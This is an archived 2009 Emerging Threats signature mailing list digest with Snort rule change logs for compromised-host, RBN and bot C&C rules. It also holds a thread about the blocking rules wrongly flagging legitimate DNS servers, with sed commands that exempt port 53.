url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (57): 2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET POLICY Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.checkupdown.com/status/E403.html 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-web.rules (1): #by Kevin Ross and Bojan Zdrnja [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (5): 2002801 || ET WEB_SPECIFIC Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org -> Removed from emerging-sid-msg.map.txt (5): 2002801 || ET WEB_SPECIFIC Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org -> Removed from emerging-web_sql_injection.rules (3): # Submitted by Michael Holstein, 2006-02-13. Reference from scheidell # Submitted 2006-02-28 by Mark Warren. For Google appliances that "should" only spider internal web sites (but sometimes go wild and spider the Internet) #by Blake Hartstein of Demarc From scheidell at secnap.net Wed Aug 12 11:01:48 2009 From: scheidell at secnap.net (Michael Scheidell) Date: Wed, 12 Aug 2009 11:01:48 -0400 Subject: [Emerging-Sigs] FP on on sid 2510255 Message-ID: <4A82D95C.1070005@secnap.net> so, are you saying that dns1.name-services.com has been hacked into? zgrep 98.124.192 /var/log/snort.log.0.gz Aug 11 20:12:47 scanner snort[65132]: [1:2510255:1615] ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) [Classification: Misc Attack] [Priority: 2]: {UDP} 98.124.192.1:53 -> 10.70.1.3:25892 or is this a FP? name-services.com is used but a LOT OF PEOPLE, and blocking their traffic is bad!!! Jon: please disable the ET COMPROMISED rule sets on all IDS's and the BLOCKING rule set on all IPS's. -- Michael Scheidell, CTO Phone: 561-999-5000, x 1259 > *| *SECNAP Network Security Corporation * Certified SNORT Integrator * 2008-9 Hot Company Award Winner, World Executive Alliance * Five-Star Partner Program 2009, VARBusiness * Best Anti-Spam Product 2008, Network Products Guide * King of Spam Filters, SC Magazine 2008 _________________________________________________________________________ This email has been scanned and certified safe by SpammerTrap(r). For Information please see http://www.spammertrap.com _________________________________________________________________________ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090812/e937fba5/attachment-0001.html From evilghost at packetmail.net Wed Aug 12 11:07:00 2009 From: evilghost at packetmail.net (evilghost@packetmail.net) Date: Wed, 12 Aug 2009 10:07:00 -0500 Subject: [Emerging-Sigs] FP on on sid 2510255 In-Reply-To: <4A82D95C.1070005@secnap.net> References: <4A82D95C.1070005@secnap.net> Message-ID: <4A82DA94.7030303@packetmail.net> We have these issues, with Enom, GoDaddy, and more. Our solution was to avoid blocking on UDP 53 via the use of sed prior to rule deployment. I agree, blocking major name-servers is not a good. We find this across a few of the host/IP-based rules. #Do not block on DNS due to false positives and resolution failure. /bin/sed -i 's/alert udp\(.*\) any -> \(.*\)$/alert udp\1 \!53 -> \2/g' /opt/snortrules/rules/rules/emerging-rbn.rules /bin/sed -i 's/alert udp\(.*\) any -> \(.*\)$/alert udp\1 \!53 -> \2/g' /opt/snortrules/rules/rules/emerging-compromised.rules /bin/sed -i 's/alert ip\(.*\) any -> \(.*\)$/alert ip\1 \!53 -> \2/g' /opt/snortrules/rules/rules/emerging-botcc.rules -evilghost Michael Scheidell wrote: > so, are you saying that dns1.name-services.com has been hacked into? > > zgrep 98.124.192 /var/log/snort.log.0.gz > Aug 11 20:12:47 scanner snort[65132]: [1:2510255:1615] ET COMPROMISED > Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) > [Classification: Misc Attack] [Priority: 2]: {UDP} > 98.124.192.1:53 -> 10.70.1.3:25892 > > or is this a FP? > > name-services.com is used but a LOT OF PEOPLE, and blocking their > traffic is bad!!! > > Jon: > > please disable the ET COMPROMISED rule sets on all IDS's and the > BLOCKING rule set on all IPS's. > > > > -- > Michael Scheidell, CTO > Phone: 561-999-5000, x 1259 > > *| *SECNAP Network Security Corporation > > * Certified SNORT Integrator > * 2008-9 Hot Company Award Winner, World Executive Alliance > * Five-Star Partner Program 2009, VARBusiness > * Best Anti-Spam Product 2008, Network Products Guide > * King of Spam Filters, SC Magazine 2008 > > > ------------------------------------------------------------------------ > > This email has been scanned and certified safe by SpammerTrap?. > For Information please see www.spammertrap.com > > > ------------------------------------------------------------------------ > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > From scheidell at secnap.net Wed Aug 12 12:44:37 2009 From: scheidell at secnap.net (Michael Scheidell) Date: Wed, 12 Aug 2009 12:44:37 -0400 Subject: [Emerging-Sigs] FP on on sid 2510255 In-Reply-To: <4A82D95C.1070005@secnap.net> References: <4A82D95C.1070005@secnap.net> Message-ID: <4A82F175.4090906@secnap.net> these ip's also. looks like if blocked all of their dns servers. 98.124.193.1/32 0 98.124.196.1/32 0 98.124.197.1/32 0 Michael Scheidell wrote: > so, are you saying that dns1.name-services.com has been hacked into? > > zgrep 98.124.192 /var/log/snort.log.0.gz > Aug 11 20:12:47 scanner snort[65132]: [1:2510255:1615] ET COMPROMISED > Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) > [Classification: Misc Attack] [Priority: 2]: {UDP} > 98.124.192.1:53 -> 10.70.1.3:25892 > > or is this a FP? > > name-services.com is used but a LOT OF PEOPLE, and blocking their > traffic is bad!!! > > Jon: > > please disable the ET COMPROMISED rule sets on all IDS's and the > BLOCKING rule set on all IPS's. > > > > -- > Michael Scheidell, CTO > Phone: 561-999-5000, x 1259 > > *| *SECNAP Network Security Corporation > > * Certified SNORT Integrator > * 2008-9 Hot Company Award Winner, World Executive Alliance > * Five-Star Partner Program 2009, VARBusiness > * Best Anti-Spam Product 2008, Network Products Guide > * King of Spam Filters, SC Magazine 2008 > -- Michael Scheidell, CTO Phone: 561-999-5000, x 1259 > *| *SECNAP Network Security Corporation * Certified SNORT Integrator * 2008-9 Hot Company Award Winner, World Executive Alliance * Five-Star Partner Program 2009, VARBusiness * Best Anti-Spam Product 2008, Network Products Guide * King of Spam Filters, SC Magazine 2008 _________________________________________________________________________ This email has been scanned and certified safe by SpammerTrap(r). For Information please see http://www.spammertrap.com _________________________________________________________________________ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090812/a73863c9/attachment.html From jonkman at jonkmans.com Wed Aug 12 15:02:33 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 12 Aug 2009 15:02:33 -0400 Subject: [Emerging-Sigs] FP on on sid 2510255 In-Reply-To: <4A82DA94.7030303@packetmail.net> References: <4A82D95C.1070005@secnap.net> <4A82DA94.7030303@packetmail.net> Message-ID: <4A8311C9.4000309@jonkmans.com> I've manually removed them. They were reported through the waledac feed we get. I'd assume they're not compromised but unwittingly hosting bad accounts. Will get it reported asap! Matt evilghost at packetmail.net wrote: > We have these issues, with Enom, GoDaddy, and more. Our solution was to > avoid blocking on UDP 53 via the use of sed prior to rule deployment. I > agree, blocking major name-servers is not a good. We find this across a > few of the host/IP-based rules. > > #Do not block on DNS due to false positives and resolution failure. > /bin/sed -i 's/alert udp\(.*\) any -> \(.*\)$/alert udp\1 \!53 -> \2/g' > /opt/snortrules/rules/rules/emerging-rbn.rules > /bin/sed -i 's/alert udp\(.*\) any -> \(.*\)$/alert udp\1 \!53 -> \2/g' > /opt/snortrules/rules/rules/emerging-compromised.rules > /bin/sed -i 's/alert ip\(.*\) any -> \(.*\)$/alert ip\1 \!53 -> \2/g' > /opt/snortrules/rules/rules/emerging-botcc.rules > > -evilghost > > > Michael Scheidell wrote: >> so, are you saying that dns1.name-services.com has been hacked into? >> >> zgrep 98.124.192 /var/log/snort.log.0.gz >> Aug 11 20:12:47 scanner snort[65132]: [1:2510255:1615] ET COMPROMISED >> Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) >> [Classification: Misc Attack] [Priority: 2]: {UDP} >> 98.124.192.1:53 -> 10.70.1.3:25892 >> >> or is this a FP? >> >> name-services.com is used but a LOT OF PEOPLE, and blocking their >> traffic is bad!!! >> >> Jon: >> >> please disable the ET COMPROMISED rule sets on all IDS's and the >> BLOCKING rule set on all IPS's. >> >> >> >> -- >> Michael Scheidell, CTO >> Phone: 561-999-5000, x 1259 >>> *| *SECNAP Network Security Corporation >> * Certified SNORT Integrator >> * 2008-9 Hot Company Award Winner, World Executive Alliance >> * Five-Star Partner Program 2009, VARBusiness >> * Best Anti-Spam Product 2008, Network Products Guide >> * King of Spam Filters, SC Magazine 2008 >> >> >> ------------------------------------------------------------------------ >> >> This email has been scanned and certified safe by SpammerTrap?. >> For Information please see www.spammertrap.com >> >> >> ------------------------------------------------------------------------ >> >> ------------------------------------------------------------------------ >> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Wed Aug 12 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Wed, 12 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090812200012.3EC0C4504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Wed Aug 12 16:00:12 2009 [***] [+++] Added rules: [+++] 2003634 - ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan (emerging-scan.rules) 2406730 - ET RBN Known Russian Business Network IP TCP (366) (emerging-rbn.rules) 2406731 - ET RBN Known Russian Business Network IP UDP (366) (emerging-rbn.rules) 2406732 - ET RBN Known Russian Business Network IP TCP (367) (emerging-rbn.rules) 2406733 - ET RBN Known Russian Business Network IP UDP (367) (emerging-rbn.rules) 2406734 - ET RBN Known Russian Business Network IP TCP (368) (emerging-rbn.rules) 2406735 - ET RBN Known Russian Business Network IP UDP (368) (emerging-rbn.rules) 2406736 - ET RBN Known Russian Business Network IP TCP (369) (emerging-rbn.rules) 2406737 - ET RBN Known Russian Business Network IP UDP (369) (emerging-rbn.rules) 2406738 - ET RBN Known Russian Business Network IP TCP (370) (emerging-rbn.rules) 2406739 - ET RBN Known Russian Business Network IP UDP (370) (emerging-rbn.rules) 2406740 - ET RBN Known Russian Business Network IP TCP (371) (emerging-rbn.rules) 2406741 - ET RBN Known Russian Business Network IP UDP (371) (emerging-rbn.rules) 2406742 - ET RBN Known Russian Business Network IP TCP (372) (emerging-rbn.rules) 2406743 - ET RBN Known Russian Business Network IP UDP (372) (emerging-rbn.rules) 2406744 - ET RBN Known Russian Business Network IP TCP (373) (emerging-rbn.rules) 2406745 - ET RBN Known Russian Business Network IP UDP (373) (emerging-rbn.rules) 2406746 - ET RBN Known Russian Business Network IP TCP (374) (emerging-rbn.rules) 2406747 - ET RBN Known Russian Business Network IP UDP (374) (emerging-rbn.rules) 2406748 - ET RBN Known Russian Business Network IP TCP (375) (emerging-rbn.rules) 2406749 - ET RBN Known Russian Business Network IP UDP (375) (emerging-rbn.rules) 2406750 - ET RBN Known Russian Business Network IP TCP (376) (emerging-rbn.rules) 2406751 - ET RBN Known Russian Business Network IP UDP (376) (emerging-rbn.rules) 2406752 - ET RBN Known Russian Business Network IP TCP (377) (emerging-rbn.rules) 2406753 - ET RBN Known Russian Business Network IP UDP (377) (emerging-rbn.rules) 2406754 - ET RBN Known Russian Business Network IP TCP (378) (emerging-rbn.rules) 2406755 - ET RBN Known Russian Business Network IP UDP (378) (emerging-rbn.rules) 2406756 - ET RBN Known Russian Business Network IP TCP (379) (emerging-rbn.rules) 2406757 - ET RBN Known Russian Business Network IP UDP (379) (emerging-rbn.rules) 2406758 - ET RBN Known Russian Business Network IP TCP (380) (emerging-rbn.rules) 2406759 - ET RBN Known Russian Business Network IP UDP (380) (emerging-rbn.rules) 2406760 - ET RBN Known Russian Business Network IP TCP (381) (emerging-rbn.rules) 2406761 - ET RBN Known Russian Business Network IP UDP (381) (emerging-rbn.rules) 2406762 - ET RBN Known Russian Business Network IP TCP (382) (emerging-rbn.rules) 2406763 - ET RBN Known Russian Business Network IP UDP (382) (emerging-rbn.rules) 2406764 - ET RBN Known Russian Business Network IP TCP (383) (emerging-rbn.rules) 2406765 - ET RBN Known Russian Business Network IP UDP (383) (emerging-rbn.rules) 2406766 - ET RBN Known Russian Business Network IP TCP (384) (emerging-rbn.rules) 2406767 - ET RBN Known Russian Business Network IP UDP (384) (emerging-rbn.rules) 2406768 - ET RBN Known Russian Business Network IP TCP (385) (emerging-rbn.rules) 2406769 - ET RBN Known Russian Business Network IP UDP (385) (emerging-rbn.rules) 2406770 - ET RBN Known Russian Business Network IP TCP (386) (emerging-rbn.rules) 2406771 - ET RBN Known Russian Business Network IP UDP (386) (emerging-rbn.rules) 2406772 - ET RBN Known Russian Business Network IP TCP (387) (emerging-rbn.rules) 2406773 - ET RBN Known Russian Business Network IP UDP (387) (emerging-rbn.rules) 2406774 - ET RBN Known Russian Business Network IP TCP (388) (emerging-rbn.rules) 2406775 - ET RBN Known Russian Business Network IP UDP (388) (emerging-rbn.rules) 2407730 - ET RBN Known Russian Business Network IP TCP - BLOCKING (366) (emerging-rbn-BLOCK.rules) 2407731 - ET RBN Known Russian Business Network IP UDP - BLOCKING (366) (emerging-rbn-BLOCK.rules) 2407732 - ET RBN Known Russian Business Network IP TCP - BLOCKING (367) (emerging-rbn-BLOCK.rules) 2407733 - ET RBN Known Russian Business Network IP UDP - BLOCKING (367) (emerging-rbn-BLOCK.rules) 2407734 - ET RBN Known Russian Business Network IP TCP - BLOCKING (368) (emerging-rbn-BLOCK.rules) 2407735 - ET RBN Known Russian Business Network IP UDP - BLOCKING (368) (emerging-rbn-BLOCK.rules) 2407736 - ET RBN Known Russian Business Network IP TCP - BLOCKING (369) (emerging-rbn-BLOCK.rules) 2407737 - ET RBN Known Russian Business Network IP UDP - BLOCKING (369) (emerging-rbn-BLOCK.rules) 2407738 - ET RBN Known Russian Business Network IP TCP - BLOCKING (370) (emerging-rbn-BLOCK.rules) 2407739 - ET RBN Known Russian Business Network IP UDP - BLOCKING (370) (emerging-rbn-BLOCK.rules) 2407740 - ET RBN Known Russian Business Network IP TCP - BLOCKING (371) (emerging-rbn-BLOCK.rules) 2407741 - ET RBN Known Russian Business Network IP UDP - BLOCKING (371) (emerging-rbn-BLOCK.rules) 2407742 - ET RBN Known Russian Business Network IP TCP - BLOCKING (372) (emerging-rbn-BLOCK.rules) 2407743 - ET RBN Known Russian Business Network IP UDP - BLOCKING (372) (emerging-rbn-BLOCK.rules) 2407744 - ET RBN Known Russian Business Network IP TCP - BLOCKING (373) (emerging-rbn-BLOCK.rules) 2407745 - ET RBN Known Russian Business Network IP UDP - BLOCKING (373) (emerging-rbn-BLOCK.rules) 2407746 - ET RBN Known Russian Business Network IP TCP - BLOCKING (374) (emerging-rbn-BLOCK.rules) 2407747 - ET RBN Known Russian Business Network IP UDP - BLOCKING (374) (emerging-rbn-BLOCK.rules) 2407748 - ET RBN Known Russian Business Network IP TCP - BLOCKING (375) (emerging-rbn-BLOCK.rules) 2407749 - ET RBN Known Russian Business Network IP UDP - BLOCKING (375) (emerging-rbn-BLOCK.rules) 2407750 - ET RBN Known Russian Business Network IP TCP - BLOCKING (376) (emerging-rbn-BLOCK.rules) 2407751 - ET RBN Known Russian Business Network IP UDP - BLOCKING (376) (emerging-rbn-BLOCK.rules) 2407752 - ET RBN Known Russian Business Network IP TCP - BLOCKING (377) (emerging-rbn-BLOCK.rules) 2407753 - ET RBN Known Russian Business Network IP UDP - BLOCKING (377) (emerging-rbn-BLOCK.rules) 2407754 - ET RBN Known Russian Business Network IP TCP - BLOCKING (378) (emerging-rbn-BLOCK.rules) 2407755 - ET RBN Known Russian Business Network IP UDP - BLOCKING (378) (emerging-rbn-BLOCK.rules) 2407756 - ET RBN Known Russian Business Network IP TCP - BLOCKING (379) (emerging-rbn-BLOCK.rules) 2407757 - ET RBN Known Russian Business Network IP UDP - BLOCKING (379) (emerging-rbn-BLOCK.rules) 2407758 - ET RBN Known Russian Business Network IP TCP - BLOCKING (380) (emerging-rbn-BLOCK.rules) 2407759 - ET RBN Known Russian Business Network IP UDP - BLOCKING (380) (emerging-rbn-BLOCK.rules) 2407760 - ET RBN Known Russian Business Network IP TCP - BLOCKING (381) (emerging-rbn-BLOCK.rules) 2407761 - ET RBN Known Russian Business Network IP UDP - BLOCKING (381) (emerging-rbn-BLOCK.rules) 2407762 - ET RBN Known Russian Business Network IP TCP - BLOCKING (382) (emerging-rbn-BLOCK.rules) 2407763 - ET RBN Known Russian Business Network IP UDP - BLOCKING (382) (emerging-rbn-BLOCK.rules) 2407764 - ET RBN Known Russian Business Network IP TCP - BLOCKING (383) (emerging-rbn-BLOCK.rules) 2407765 - ET RBN Known Russian Business Network IP UDP - BLOCKING (383) (emerging-rbn-BLOCK.rules) 2407766 - ET RBN Known Russian Business Network IP TCP - BLOCKING (384) (emerging-rbn-BLOCK.rules) 2407767 - ET RBN Known Russian Business Network IP UDP - BLOCKING (384) (emerging-rbn-BLOCK.rules) 2407768 - ET RBN Known Russian Business Network IP TCP - BLOCKING (385) (emerging-rbn-BLOCK.rules) 2407769 - ET RBN Known Russian Business Network IP UDP - BLOCKING (385) (emerging-rbn-BLOCK.rules) 2407770 - ET RBN Known Russian Business Network IP TCP - BLOCKING (386) (emerging-rbn-BLOCK.rules) 2407771 - ET RBN Known Russian Business Network IP UDP - BLOCKING (386) (emerging-rbn-BLOCK.rules) 2407772 - ET RBN Known Russian Business Network IP TCP - BLOCKING (387) (emerging-rbn-BLOCK.rules) 2407773 - ET RBN Known Russian Business Network IP UDP - BLOCKING (387) (emerging-rbn-BLOCK.rules) 2407774 - ET RBN Known Russian Business Network IP TCP - BLOCKING (388) (emerging-rbn-BLOCK.rules) 2407775 - ET RBN Known Russian Business Network IP UDP - BLOCKING (388) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2009701 - ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt (emerging.rules) 2406000 - ET RBN Known Russian Business Network IP TCP (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network IP UDP (1) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network IP TCP (2) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network IP UDP (2) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network IP TCP (3) 